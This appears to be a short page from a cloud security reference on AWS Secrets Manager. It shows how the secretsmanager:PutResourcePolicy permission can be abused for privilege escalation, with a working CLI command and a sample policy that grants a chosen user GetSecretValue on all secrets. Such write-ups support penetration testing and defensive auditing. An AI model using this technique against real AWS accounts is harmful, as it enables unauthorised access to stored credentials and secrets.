Secrets Manager
Abusable AWS Secrets Manager permissions that can lead to compromise or privilege escalation
secretsmanager:PutResourcePolicy
With access to this action, you can attach a resource-based permission policy to a secret, effectively giving yourself whatever access you want.
aws secretsmanager put-resource-policy --secret-id <secretId> --resource-policy file://secrets-policy.json
# sample resource policy for secret
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::123456789012:user/<userName>"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}
Last updated
Was this helpful?